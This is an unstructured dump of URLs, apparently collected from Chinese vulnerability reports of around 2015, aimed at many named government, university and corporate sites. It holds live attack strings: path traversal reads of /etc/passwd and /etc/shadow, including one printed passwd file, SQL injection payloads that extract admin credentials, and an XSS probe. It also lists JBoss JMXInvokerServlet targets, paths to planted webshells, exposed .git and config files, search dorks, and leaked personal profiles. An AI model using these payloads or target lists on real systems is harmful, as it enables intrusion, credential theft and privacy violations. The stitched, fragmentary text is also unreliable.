https://www.baidu.com/s?ie=utf-8&f=8&rsv_bp=1&rsv_idx=1&tn=baidu&wd=inurl%3Ainsurance%2Forder%2Fdetailreadonly&rsv_pq=860930e00000bf00&rsv_t=b288Uvz9ztEcwTYkgdiisOYm1VRlFB6ayS%2F3g4SHh6kdE07doGcjezvpyvk&rsv_enter=1&inputT=1291&rsv_sug3=15&rsv_sug1=6&rsv_n=2&bs=inurl%3B http://wx.xgimi.com/admin.php https://github.com/truecn/websdk/blob/917ced5828c1dccc8298b1288f7ba66595ef33c6/src/META-INF/config.properties http://www.hnedu.cn/tg/System/usermanager.jsp http://uporder.yonyou.com/file/ http://ns.35.com/wp-login.php http://**.**.**/index.php http://202.123.110.44/login.action http://airport.csair.com/SelfMonitoring/CussMain.do?method=selectData&city=ALL www.jinhaidai.com http://ir.anta.com/ http://www.mogujie.com/registermg/updatepassword http://hlm.53kf.com http://hunjia.55bbs.com/files/activity/vote.php?album_id=79&t=3 https://igop.cmgame.com:7443/cas/login http://igop.cmgame.com:38086/pop/content/createImage2page.action?localPath=/upload/20150515/131558/40947/icon/1431666936394.jpg http://igop.cmgame.com:38086/pop/content/modifyGameMyWork.action?contentInfo.contentId=40947&contentInfo.gameType=1 http://www.hbychrss.gov.cn/module/jslib/jquery/jpage/morecolumndataproxy.jsp?endrecord=9&perpage=3&startrecord=1 http://**.**.**/zentao/ http://**.**.**/zentao/upgrade.phpm=editor&f=edit&filePath=RzpceGFtcHBcemVudGFvXGNvbmZpZ1xteS5waHA=&action=edit https://www.jinhaidai.com/integral/conversion www.jinhaidai.com www.jinhaidai.com http://www.oldai.cn//apk/file:///etc/passwd http://wzbtv.com/sfrx/ http://www.nxky.cn/tsxt/ http://www.myesms.net/zf/ http://60.211.253.196:81/jwxx/ http://www.wzgxzx.com/xzxx/ http://yt.linekong.com/newer_main.php?article_id=4540 http://yt.linekong.com/special/v1.1/content.php?id=9269 http://oa.seari.com.cn/wui/theme/ecology7/page/login.jsp?templateId=141&logintype=1&gopage=&message=55 http://oa.seari.com.cn:8011/hrss/rm/PositionDetail.jsp?PK_EMPTY_JOB=1001A11000000000G9WA& http://www.seari.com.cn/index.php?a=hits%27%22%28%29%26%25%3Caaa%3E%3CScRiPt%20%3Eprompt%28/x/%29%3C/ScRiPt%3E&id=798&m=News ttp://www.seari.com.cn/phpinfo.php http://www.seari.com.cn/en/admin/ http://www.seari.com.cn/core/conf/ http://www.seari.com.cn/uploads/ http://60.216.104.27:81/ www.wgyp.com http://61.161.98.234/raiders/search.php?dest_id=333%27 http://61.161.98.234/admin/index.php http://sme.nju.edu.cn/content/news_detail.php?id=89 http://sme.nju.edu.cn/content/admin/sem_user/admin_php/Login.php http://www.esikao.net/page.php?id=56 http://www.inspur.com/ http://117.40.187.175:8008/outportal/bulletin/Businessview.jsp?businessid=8080812a897481012a9761f71e0618 http://218.65.59.94/outportal/bulletin/Businessview.jsp?businessid=018ae42b585524012b5983103e01a5 http://117.40.180.140:8008/outportal/bulletin/Businessview.jsp?businessid=f08ab83fbc3b3e0145ae47dd6f146e http://117.40.186.185:8008/outportal/bulletin/Businessview.jsp?businessid=8080812a9e1b06012aa196274a0086 http://218.65.5.117:8008/outportal/bulletin/Businessview.jsp?businessid=8080812a6e176e012a6edfff7e02ce http://124.117.246.20:81/yz/xxbm/gagdgx.asp www.multigold.com.cn/goodsDetail/getRushByStatus?callback=jQuery171020818918524309993_1432000259692 www.multigold.com.cn/goodsDetail/getRushByStatus?callback=jQuery171020818918524309993_1432000259692 http://jxk.sdust.edu.cn/show.asp?nrID=377 http://wooyun.org/bugs/wooyun-2010-069003 http://www.qzdatasoft.com/ http://www.qzdatasoft.com/cgal.html http://113.135.195.58/jiaowu_ylxy/hlp/help.asp?HlpCode=1 http://61.183.19.35/hlp/help.asp?HlpCode=1 http://221.212.251.229/jiaowu2008/hlp/help.asp?HlpCode=1 http://221.238.158.84/jw//hlp/help.asp?HlpCode=1 http://221.232.159.24/dhjw//hlp/help.asp?HlpCode=1 http://wssp.jiangxi.gov.cn:8008/outportal/licenseManage/licenseManage.jsp http://117.40.187.175:8008/outportal/licenseManage/licenseManage.jsp http://xzfw.jinxi.gov.cn/outportal/licenseManage/licenseManage.jsp http://xzfw.jxcr.gov.cn/outportal/licenseManage/licenseManage.jsp http://120.203.196.20/outportal/licenseManage/licenseManage.jsp encoding:utf-8 http://bbs.emoney.cn/config/config_ucenter.php.bak http://bjey.org/ http://bjey.org/admin http://218.108.28.59/Home/LogOn rsync://58.68.237.116/ rsync://58.68.237.116/bak rsync://58.68.237.116/daydate http://my.zto.cn http://my.zto.cn/AddressManage/Index/ http://nju.fitoo.com/Match/jiangsu/apply.aspx随意注册一个账号(邮箱验证),信息随便填写,那就用强大的163邮箱呗。 www.yixuebaike.cn)框架为Joomla,安装的HD http://211.71.232.61:81/default.aspx http://bcm.open.com.cn/Va_username.aspx?username= http://ccaa.open.com.cn/logon.aspx http://www.daimayi.com/index.php/About/index/cate_id/* http://www.zzlyj.gov.cn/gginfo.asp?id=7630 http://ecs.taikang.com http://bqxin.cn/bf/saleslogin.aspx http://112.80.248.138:8080/ http://112.80.248.138:8080/phpmyadmin结果还可以。 www.telecom10000.com/ http://www.telecom10000.com/new_1.asp?id=17 site:sina.com.cn inurl:club http://club.baby.sina.com.cn/api/api.php?s=suggest&a=user&q=1 http://club.mil.news.sina.com.cn/api/api.php?s=suggest&a=user&q=1 http://club.eladies.sina.com.cn/api/api.php?s=suggest&a=user&q=1 http://club.news.sina.com.cn/api/api.php?s=suggest&a=user&q=1 http://club.ent.sina.com.cn/api/api.php?s=suggest&a=user&q=1 http://club.astro.sina.com.cn/api/api.php?s=suggest&a=user&q=1 http://old.gzfcj.gov.cn/wyzt/viewnews.aspx?id=62 https://github.com/caoguangyao/wasu_rmss/blob/master/RMSS%E7%9B%B8%E5%85%B3%E8%B5%84%E6%96%99.txt http://218.108.255.183/UserLogin/Login.aspx http://125.210.208.56/hsyw/Login.aspx http://125.210.208.56/hsywnew/Login.aspx http://www.daimayi.com/index.php/Ask/detail/id/13 index.php/Ask/detail/id/13 www.daimayi.com http://service.vmovier.com/.git/config http://www.vmovier.com/.git/config http://magicapi.vmovier.com/.git/config http://www.test.vmovier.com/.git/config http://222.240.156.74/login.php http://222.240.156.74/phpmyadmin/ http://222.240.156.74/phpmyadmin/libraries/config/user_preferences.forms.php http://yewu.tuhu.cn/Account/LogOn http://218.25.120.69:81/passport/login.mspx http://skch.nju.edu.cn/showliterary.php?id=65 http://223.4.57.81:80//.git/config https://github.com/zanbai/web.git http://www.datonglr.gov.cn/news/NewsListTitle.aspx?Title=1 http://app3.rthk.org.hk/press/main.php?id=3 http://www.sn-cnpc.com/organ/detail.asp?id=1 http://www.sn-cnpc.com/admin/login.asp http://www.sn-cnpc.com:80/admin/../admin.rar http://www.sn-cnpc.com:80/cnpcoa/login.asp https://vpn.lppz.com http://192.168.32.145:8080存在Jboss的JMXInvokerServlet漏洞 url:http://forever21.cn/Product/NewArrivals.aspx?Category=21men_app&PageSize=40&MoreColor=¶msize=%25%27%20AND%202471%3d2471%20AnD%20%27%25%27%3d%27¶mprice=&CurrentPage=1¶morder= http://1 http://tj17996.com http://tj17996.com/invoker/JMXInvokerServlet admin:service=DeploymentFileRepository http://tj17996.com/myname/index.jsp http://tj17996.com/myname/bak.jsp http://pz.99.com http://pay.fjca.com.cn/epay_server/viewPayInfoByOrdId.jsp?ordId=2015066020006488 http://pay.fjca.com.cn/epay_server/viewPayInfoByOrdId.jsp?ordId=2015066020006490 http://boss.iqianjin.com/ http://boss.iqianjin.com:80/index.jsp http://lwjs.91wan.com/huodong/bizhi/download.php?f=../../../huodong/bizhi/download.php http://www.showjoy.com/sku/9812.html http://cpms.ccgp.gov.cn/FCKeditor/editor/filemanager/browser/default/browser.html?Connector=%2FFCKeditor%2Feditor%2Ffilemanager%2Fconnectors%2Fjsp%2Fconnector.jsp http://uc.mojichina.com/findpwd/byphone# http://uc.mojichina.com/findpwd/byphone# http://uc.mojichina.com/findpwd/verifysms http://uc.mojichina.com/findpwd/resetpwdbyphone# https://118 http://kenting.caesarpark.com.tw/news.php?No=642&NewsType=3&test1=63&test2=235&test3=63 http://gui.sanguosha.com/page.php http://smsold.tdxinfo.com/ http://smsold.tdxinfo.com/bycinnersys/images/ http://smsold.tdxinfo.com/bycinnersys/UpLoadFile/ http://smsold.tdxinfo.com/bycinnersys/logs/ http://smsold.tdxinfo.com/bycinnersys/web.zip http://cms.300.cn/invoker/JMXInvokerServlet http://if.xinjunshi.com/plus/recommend.php?aid=1&_FILES[type][name]&_FILES[type][size]&_FILES[type][type]&_FILES[type][tmp_name]=aa\%27and+char%28@%60%27%60%29+/*!50000Union*/+/*!50000SeLect*/+1,2,3,concat%280x3C6162633E,group_concat%280x7C,userid,0x3a,pwd,0x7C%29,0x3C2F6162633E%29,5,6,7,8,9%20from%20%60%23@__admin%60%23%22 http://en.anta.com/anta.zip http://career.shenhuagroup.com.cn/cwgs20150506/ http://career.shenhuagroup.com.cn/cwgs20150506/UpLoad/ASPXspy2.aspx http://123.157.10.19:8080/factory_index.action www.ele.to http://wenku.baidu.com/view/bf29bff301f69e31433294b5.html http://chinese.cnu.edu.cn/index.php http://219.142.121.212/ http://www.17500.cn:80/tc225/survey_showR.php?issue=09125 http://tripcome.com:8080/b2b/index.jsp http://nsp.lashou.com/Home/Login/index http://183.224.40.116/Default.aspx http://183.224.40.116/WebResource.axd?d=8W7nSsLrHIqKwpHT3roW http://www.bio.gxnu.edu.cn/index.php/Article/index/id/1161 http://www.ci.gxnu.edu.cn/index.php/article/index/id/2688 inurl:contentmanager.do?method=view http://www.cnstedu.cn/webedit/uploadfile.do?action=open&filepath=../../../../cms/cmsapp/search.jsp http://kxsz.gdec.net/webedit/uploadfile.do?action=open&filepath=../../../../cms/cmsapp/search.jsp http://www.cimuset.org/webedit/uploadfile.do?action=open&filepath=../../../../cms/cmsapp/search.jsp http://www.fdstmc.org.cn/webedit/uploadfile.do?action=open&filepath=../../../../cms/cmsapp/search.jsp http://www.chinaworldmall.cn/webedit/uploadfile.do?action=open&filepath=../../../../cms/cmsapp/search.jsp http://www.sqkpym.org.cn/webedit/uploadfile.do?action=open&filepath=../../../../cms/cmsapp/search.jsp www.cnstedu.cn http://jpkc.nwpunec.net:8002/jingpin/course/huaxue!list.action www.thankyou99.com/ http://api.thankyou99.com/4006168169/cai/shlists.php?id=1 http://www.thankyou99.com/Admincenter/Index http://www.thankyou99.com/Admincenter/Index http://api.thankyou99.com/4006168169/houtai http://wenku.baidu.com/view/add59c06b9d528ea80c77925.html http://111.113.2.206:8003/ https://www.dayspay.com.cn/download.jsp?file=../../../../../../../../../../../../etc/passwd http://mts.uutest.cn/net http://www.gdjyjt.gov.cn/index.asp?zc=13&ch=2&fid4=1 http://**.**.**.**/public/download.jsp?file=../../../../../../../../../../etc/passwd http://www.tsjt.gov.cn/info_Show.asp?InfoId=1180&ClassId=64&Topid=0 index.php/ceo8/score_search http://v.17173.com/u/55339368/playlist/favorites/?keywords=*&order=time http://oa.travelzen.com/Users/Membership/LogOn http://nms.city.sina.com.cn/index.php?m=Template&a=preview&report_id=3713 http://www.inspur.com/ intitle:ECGAP http://xzfw.yunyang.gov.cn/Channel/ChannelList.aspx?a=a&LicenseType=1 http://118.182.148.163:8001/zwdt/Channel/ChannelList.aspx?a=a&LicenseType=1 http://wbxt.lw.gov.cn/sp/Channel/ChannelList.aspx?a=a&LicenseType=1 http://www.dh.zszwfw.gov.cn/Channel/ChannelList.aspx?a=a&LicenseType=1 http://www.ss.zszwfw.gov.cn/Channel/ChannelList.aspx?a=a&LicenseType=1 http://www.lssp.gov.cn/Channel/ChannelList.aspx?a=a&LicenseType=1 http://www.dfxzfw.cn/LangChao.ECGAP.OutPortal/Channel/ChannelList.jsp?a=a&LicenseType=1 http://www.jnzwzx.gov.cn/Channel/ChannelList.aspx?a=a&LicenseType=1 http://www.zbxzfwzx.gov.cn/Channel/ChannelList.aspx?a=a&LicenseType=1 http://118.182.148.163:8001/zwdt//Channel/ChannelList.aspx?a=a&LicenseType=1 http://124.128.196.195/waiwang//Channel/ChannelList.aspx?a=a&LicenseType=1 http://221.214.108.172/waiwang/Channel/ChannelList.aspx?a=a&LicenseType=1 http://61.178.249.69/spww/Channel/ChannelList.aspx?a=a&LicenseType=1 http://www.mudanxzfw.cn//Channel/ChannelList.aspx?a=a&LicenseType=1 http://www.rsjjjc.gov.cn//Channel/ChannelList.aspx?a=a&LicenseType=1 http://www.mudanxzfw.cn//Channel/ChannelList.aspx?a=a&LicenseType=1 http://61.154.13.90/Channel/ChannelList.aspx?a=a&LicenseType=1 http://wbdt.gdqts.gov.cn/LangChao.ECGAP.OutPortal/Channel/ChannelList.aspx?a=a&LicenseType=1 http://www.nbjdzw.gov.cn/Channel/ChannelList.aspx?a=a&LicenseType=1 http://218.56.40.228/ZhiFuQuShenPi/Channel/ChannelList.aspx?a=a&LicenseType=1 http://221.206.154.215:81/langchao.ecgap.outportal/Channel/ChannelList.aspx?a=a&LicenseType=1 http://www.fjxzsp.com/LangChao.ECGAP.OutPortal/Channel/ChannelList.aspx?a=a&LicenseType=1 http://shenpi.xuchang.gov.cn/Channel/ChannelList.aspx?a=a&LicenseType=1 http://www.hyzwfw.com/Channel/ChannelList.aspx?a=a&LicenseType=1 http://shenpi.haishu.gov.cn/LangChao.ECGAP.OutPortal/Channel/ChannelList.aspx?a=a&LicenseType=1 http://wssp.taijiang.gov.cn/Channel/ChannelList.aspx?a=a&LicenseType=1 http://shenpi.xcxian.gov.cn/Channel/ChannelList.aspx?a=a&LicenseType=1 http://www.rsjjjc.gov.cn/Channel/ChannelList.aspx?a=a&LicenseType=1 http://61.154.13.90//Channel/ChannelList.aspx?a=a&LicenseType=1 http://shenpi.xiangxian.gov.cn//Channel/ChannelList.aspx?a=a&LicenseType=1 http://m.thepaper.cn/ http://roll.hexun.com:8080/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/shadow http://roll.hexun.com:8080/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/root/.bash_history http://www.352.com/member/info/modify_address.do?id=XXXX http://www.352.com/member/info/modify_address.do?id=XXXX http://www.wooyun.org/bugs/wooyun-2010-0115388/trace/c415f911f515dee9836cefdab9ca01a3 http://rong.36kr.com/api/v1/ios-user/-ID-/profile http://rong.36kr.com/api/v1/ios-user/711/profile http://krplus-pic.b0.upaiyun.com/201503/23195614/7be9e2cc259d7834.jpg","email":"laputan马赛克@fotoplace.cc","enterpriser":1,"id":711,"investorType":100,"isDisplayWeixin":false,"name":"杨柳","nickAvatar":"http://wx.qlogo.cn/mmopen/ajNVdqHZLLAl21jrHaCHQzgF1DrAsBDIJ1RJ3Hvvr8PCfmCQIkfbBHKoItkKTgDBV4SDZSFgiaoZUs4sdR7udXQ/0","nickName":"杨柳(足记fotoplace)","phone":"13918331马赛克"}},"msg":"操作成功! http://rong.36kr.com/api/v1/ios-user/28633/profile http://krplus-pic.b0.upaiyun.com/c00dd2691e0937663493df104fb18976","email":"马赛克u@hearst.com","enterpriser":0,"id":28633,"intro":"赫斯特资本中国投资主管","investorType":20,"isDisplayWeixin":false,"linkedin":"","name":"胡盈青","nickName":"1350199马赛克","phone":"1350199马赛克","weibo http://ggzx.stock.hexun.com/port/focus_industry_getone.jsp?t=2&c=10&s=2&tag=focus_hyzx&callback=callback&noCacheIE=1432033218504&k=0570 http://www.homeinns.com/homeinn,自己先注册一个账号,后面要用; http://17500.cn/tc225/survey_showR.php?issue=07087 http://www.jincai.sh.cn/BasePlate/DataCenter/OnlineBrowse.aspx http://www.shjzzx.com/BasePlate/DataCenter/OnlineBrowse.aspx http://www.etzx.edu.sh.cn/BasePlate/DataCenter/OnlineBrowse.aspx http://www.mhjjy.com/BasePlate/DataCenter/OnlineBrowse.aspx http://ljxx.mhedu.sh.cn/BasePlate/DataCenter/OnlineBrowse.aspx http://tzjt.sjtu.edu.cn/BasePlate/DataCenter/OnlineBrowse.aspx http://www.jcsy.pudong-edu.sh.cn/BasePlate/DataCenter/OnlineBrowse.aspx http://photo.qpedu.cn/BasePlate/DataCenter/OnlineBrowse.aspx http://www.mszb.pte.sh.cn/BasePlate/DataCenter/OnlineBrowse.aspx http://www.mszb.pte.sh.cn/BasePlate/DataCenter/OnlineBrowse.aspx http://www.mszb.pte.sh.cn/wooyun.aspx http://222.249.250.110:8081/ http://222.249.250.110:8089/ http://222.249.250.110:8090/ http://ccaa.open.com.cn/ExamSite/index.aspx http://en.anta.com/ http://en.anta.com/products.php?keyword=1 http://rd.dawenmedia.com http://rd.dawenmedia.com/editor/attached/image/20150522/20150522172414_21197.jpg/.php https://github.com/lewis-bo/niulanshan/blob/5b06fc102582e25ca0b16df0b0a6d0753c71cc3d/site/WebContent/WEB-INF/classes/email.properties www.guh-software.de http://www.sysp.gov.cn/webservice2.asmx,暴漏大量的webservice接口,可以查询、插入、更新数据。而且,接口没有认证。如下图所示: http://www.sysp.gov.cn/webservice2.asmx http://tempuri.org/SQLSelect www.sysp.gov.cn http://www.xiangyahui.com/ask?schoolid=1 http://XXX/discuz/utility/convert/index.php?a=config&source=d7.2_x2.0 http://sms.9air.com/fileManagement.action?fileName=2014%E5%B9%B411%E6%9C%8828%E6%97%A5%E5%AE%89%E5%85%A8%E5%AE%A3%E8%AE%B2%E6%95%99%E8%82%B2%E5%9F%B9%E8%AE%AD%E6%9D%90%E6%96%99.rar&fileAddr=/WEB-INF/fileManagementupload/14177648884410.rar http://sms.9air.com/fileManagement.action?fileName=2014%E5%B9%B411%E6%9C%8828%E6%97%A5%E5%AE%89%E5%85%A8%E5%AE%A3%E8%AE%B2%E6%95%99%E8%82%B2%E5%9F%B9%E8%AE%AD%E6%9D%90%E6%96%99.rar&fileAddr=/WEB-INF/fileManagementupload/../../../../../../etc/passwd root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin distcache:x:94:94:Distcache:/:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin rpc:x:32:32:Portmapper user:/:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin squid:x:23:23::/var/spool/squid:/sbin/nologin mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash pcap:x:77:77::/var/arpwatch:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin avahi:x:70:70:Avahi daemon:/:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous User:/var/lib/nfs:/sbin/nologin named:x:25:25:Named:/var/named:/sbin/nologin hsqldb:x:96:96::/var/lib/hsqldb:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin avahi-autoipd:x:100:102:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin xfs:x:43:43:X Server:/etc/X11/fs:/sbin/nologin gdm:x:42:42::/var/gdm:/sbin/nologin sabayon:x:86:86:Sabayon user:/home/sabayon:/sbin/nologin http://eda.chaoxing.com/showLogin http://wenku.baidu.com/view/e90e61e86294dd88d0d26be4.html http://admin.eryavideo.com/left.aspx http://www.licaifan.com:80/user/delMessage http://www.wxcyfw.com/ http://www.wxcyfw.com/jeeadmin/jeecms/login.do?returnUrl=/jeeadmin/jeecms/index.do http://202.115.22.138/ http://www.hanqing.ruc.edu.cn/detail.php?class=news&iClassID=9&iInfoID=1854 http://law.ruc.edu.cn/office/login.asp http://www.kingsun.cn/menhu/helpcontent.aspx?classid=1 http://lanmo2008.zol.com.cn/ http://59.64.79.18/list_files.aspx?sectionid=1 http://59.64.79.18/frameContent.aspx?id=341 http://store.tdxinfo.com http://union.novel.sogou.com/ http://union.novel.sogou.com/stat/ajax?oper=grid_sum&d_start=20150421&d_end=20150521&ctype=30&is_settle=&query=&f_cols=&f_cids=&_search=false&nd=1432289822749&rows=20&page=1'&sidx=&sord=asc https://60.247.68.200/prx/000/http/localhost/login http://222.73.41.27、http://www.cqcn.org http://www.huaji.com/member/address/edit/5355 http://www.huaji.com/member/address/edit/520 http://www.huaji.com/member/address/edit/520 http://pdabase.deppon.com:8080/bam/bamCode/index.action http://www.jiukuaidao.com/ http://www.jiukuaidao.com/reg/selectCerttificate.htm http://114.112.84.135/info.php http://221.199.203.230:9001/dsoa/goods/GoodsAdd.aspx?goodsid=1&flag=2 http://xinhuachongming.com.cn/DSOA_TY/goods/GoodsAdd.aspx?goodsid=1&flag=2 http://oa.xinhuamed.com.cn/DSOA_TY/goods/GoodsAdd.aspx?goodsid=1&flag=2 http://221.199.203.230:9001/dsoa/goods/GoodsAdd.aspx?goodsid=1&flag=2 http://old.nmgswt.gov.cn/dsoa/goods/GoodsAdd.aspx?goodsid=1&flag=2 http://oa.dream-it.cn/OA/goods/GoodsAdd.aspx?goodsid=1&flag=2 http://180.141.88.102:8081/nnwj/framework/sys/login!login.action?licenseInfo=license http://180.141.88.102:8081/nnwj/adminapp/administra-appro!showApply.action?mutype= http://180.96.63.25/TZJC/WNews_queryColumnWNewsList.action?fNews.columnId=3 http://www.dingdone.com/bbs/config/config_ucenter.php http://www.dingdone.com/bbs/config/config_global.php http://service.dingdone.com/uc_server/admin.php?m=user&a=login&iframe=&sid= http://zabbix.cjdao.cn/ http://gis.lzlj.com/ gc.17173.com/GameDetail http://gc.17173.com/Lessons http://www.dib66.com http://bbs.dib66.com/uc_server/admin.php http://kpi.lzlj.com/Login.aspx http://active.zol.com.cn/08active/lanmo_campus/list.php?city=2 admin.eryavideo.com/left.aspx http://admin.eryavideo.com/Director/ReceiveTask.aspx?type=1&wd=&pagesize=2 www.chaoxing.cc帐号密码。进后台解析漏洞拿到shell https://github.com/easemob/emchat-server-examples http://174.128.237.27/ http://admin.xiazai.xunzai.com/index.php http://mobile.yiban.cn/api/v1/user/search?account=%E8%BF%99%E4%B8%80%E5%88%BB%EF%BC%8Czhang3&access_token=0e7defc6fc2b4af0e49ff98a0774a4a5 http://www.huaji.com/member/study/edit/13238 http://www.huaji.com/member/study/edit/1 urlhttp://www.huaji.com/member/study/del/13238 http://www.huaji.com/member/study/del/1 http://www.huaji.com/member/study http://www.huaji.com/member/study/edit/1 http://www.huaji.com/member/ability/edit/2975 http://www.huaji.com/member/ability/edit/1 url:http://www.huaji.com/member/ability/del/2975 http://www.huaji.com/member/ability/del/1。访问看看 http://www.huaji.com/member/ability http://www.huaji.com/member/ability/edit/1 http://202.102.41.152:8088/login.jsp http://219.143.15.9/login.jsp http://www.cicc.com.cn/portal/business/am_products_cn.xhtml?productType=1 http://www.cicc.com.cn/portal/jobs/position_list_cn.xhtml?worktype=2 http://61.129.68.194/user/login http://www.wepiao.com/?a=cinemadetailshow&c=cinema&m=web&cinemaid=1004076 http://zb.aimeizhuyi.com:8888 http://zb.aimeizhuyi.com:8888/httpmon.php?applications=2%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%28%28select%28select%20concat%28cast%28concat%28alias,0x7e,passwd,0x7e%29%20as%20char%29,0x7e%29%29%20from%20zabbix.users%20LIMIT%200,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29 https://61.177.62.254/ https://211.70.1.45/ https://222.139.212.52/ https://222.92.137.74/ https://59.61.234.109/ https://122.227.166.27/ https://123.13.224.247/ https://222.85.76.112/ https://221.176.165.214/ https://122.227.166.26/ https://117.32.249.196/ https://61.175.134.133/ https://218.26.10.175/ https://szico.com/ https://120.194.170.107/ https://118.122.90.136/ https://211.142.165.210/ https://221.12.56.242/ https://218.29.8.41/ https://116.228.51.238/ https://114.80.129.170/ https://117.158.18.199/ https://112.15.171.94 http://zhuanjiaku.ndrc.gov.cn/ http://192.168.200.1/syscmd.asp inurl:sites/MainSite http://www.352.com/ http://115.182.50.72/garb/test.php http://115.182.50.72/garb/testa.php http://115.182.50.72/upload_log.php http://115.182.50.72/upload_minidump.php http://server.51cto.comserver.51cto.com/exp/apc_survey201210/reg.php http://www.landinfo.mlr.gov.cn/ http://219.143.73.19/invokering/JMXInvokerServlet os.51cto.com/os/famousLinux/result2.php http://apps.stnts.com/?s=/abc/abc/abc/${@phpinfo%28%29 http://hotel.stnts.com//?s=/abc/abc/abc/${@phpinfo%28%29 http://jwjg.sasac.gov.cn/login.jsp http://ecard.dlmu.edu.cn/ecard/queryStuempNo.xhtml?name=and+1%3D1 http://219.141.242.25/GRETMS_HT/pages/PolicyAuthenticityQry.html http://v.admin5.com/data/uploads/2015/05/22/1992473841555f272660d5d.jpg/1.php http://api.huodongxing.com/v2/user/sendcode http://h.mapgo.cn/Login.htm http://m.wecook.cn/topic/detail/?id=444 http://mail.xy.chinamobile.com/admin/index.php http://ceo.300.cn/index.php/ceo8/score_a ip:222.73.196.45 http://222.73.196.124/index.php/%E4%BA%91%E6%9C%8D%E5%8A%A1:FastDFS http://quick.xiangrikui.com/umsg/loadMessage.do?umsg.id=15959082 http://quick.xiangrikui.com/albumlist/2176617.html http://waiqin.hnhtxx.cn/ http://122.193.9.105:8088/Home/Logon?ReturnUrl=%2f http://122.193.9.70:8085/Content/mobile/GetStbCmList.html http://122.193.9.70:8084/mobilepage/customequery.html?cc=xxxx http://desc.app111.com/beta/php.tar.gz http://xxdl.gw.com.cn/iframe.jsp\?currentPage\=2\&search\=\&subtype\=1\&type\=4 socks5://127.0.0.1:1080 xxdl.gw.com.cn/marketIframe.jsp?currentPage=2&search=&subtype=&type=0%20AND%203*2*1%3d6%20AND%20356%3d356 http://pq.appchina.com/.svn/entries http://rzpt.smesd.gov.cn/ http://rzpt.smesd.gov.cn/artical.jsp?id=a8977ca767154e2db2458af5f3b89c91 http://rzpt.smesd.gov.cn/agencyimg/8ad337822be2492b012be2dc817b0328.jsp http://zhaoht.265g.com/go.php http://zhaoht.265g.com/admincp.php http://tysj.sgcc.com.cn/tsdt/201501/P020150128376347359866.rar http://tysj.sgcc.com.cn/tsdt/201405/P020140528606494137856.zip www.anta.com/Inchon2014/admin/admin_login.php http://yjspy.bjmu.edu.cn/yjsyweb/yb/yuanban_xinwen.asp?x_recid=334 http://gps.kunlian.net:8088/index.jsp,打开辰宇卫星定位监控系统平台,如图所示: http://122.227.209.174 http://203.156.233.234/login http://203.156.233.234/script http://www.yy110.gov.cn http://www.yy110.gov.cn/manager/html http://www.yy110.gov.cn/mana11/shell.jsp http://www.yy110.gov.cn/templet/yyga/wooyun.txt http://t.ufida.com.cn/,发现存在大量的开放接口,对其中的GetVerSionJSON进行测试,发现存在sql注射漏洞。 http://tempuri.org/GetVerSionJSON soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance xmlns:xsd="http://www.w3.org/2001/XMLSchema xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/ soap:Body http://tempuri.org/ soap:Body soap:Envelope http://gzycdtb.dayoo.com http://101.251.197.246:8080/Site/ http://uhuibao.com/index.php?s=/ http://home.seentao.com/ http://seentao.yonyou.com/ http://211.160.76.245/ http://cgs.gdfcl.com.cn:9080/MultiOffice/Index.jsp http://211.160.76.245/ http://211.160.76.245/invoker/JMXInvokerServlet,shell www.uhuibao.com http://med.39.net/cds/ywxhzy/Search.aspx?Keywords=12% http://med.39.net/cds/ywxhzy/Search.aspx?Keywords=12% http://ziyuan.iiyi.com/source/search?kw=临床诊疗指南 http://sqlmap.org http://115.182.66.148/info.php http://agent.hongkongairlines.com/info.php http://ffp.hongkongairlines.com/phpinfo.php https://ffp.hongkongairlines.com/info.php http://site.hongkongairlines.com/info.php https://site.hongkongairlines.com/info.php http://open.shopex.cn/ http://open.shopex.cn/docs/api_search/8.htm?docs_keyword=&platform_id=0&method_type_id=22 http://218.206.93.54:9090/login.action http://www.cbs.fudan.edu.cn/attach/application/2015/1000.html http://www.cbs.fudan.edu.cn/attach/application/2015/1100.html http://www.cbs.fudan.edu.cn/attach/application/2015/1200.html http://www.cbs.fudan.edu.cn/attach/application/2015/1300.html http://ad.dopool.com/ad.zip http://www.tclmobile.com.cn/newsite/index.php/search/keysearch http://mp.weixin.qq.com/s?__biz=MjM5MzE3NDI5Mg==&mid=202628426&idx=3&sn=68e11ec7cdf665662a45e6d7f3b5995e&3rd=MzA3MDU4NTYzMw==&scene=6#rd http://web2.cdvcloud.com/e/extend/live/playlist.php?id=1 http://med.39.net/cds/sycd/Search.aspx?Keywords=12% http://med.39.net/cds/sycd/Search.aspx?Keywords=12% http://med.39.net/cds/jbzdjy/Search.aspx?Keywords=12% http://med.39.net/cds/jbzdjy/Search.aspx?Keywords=12% 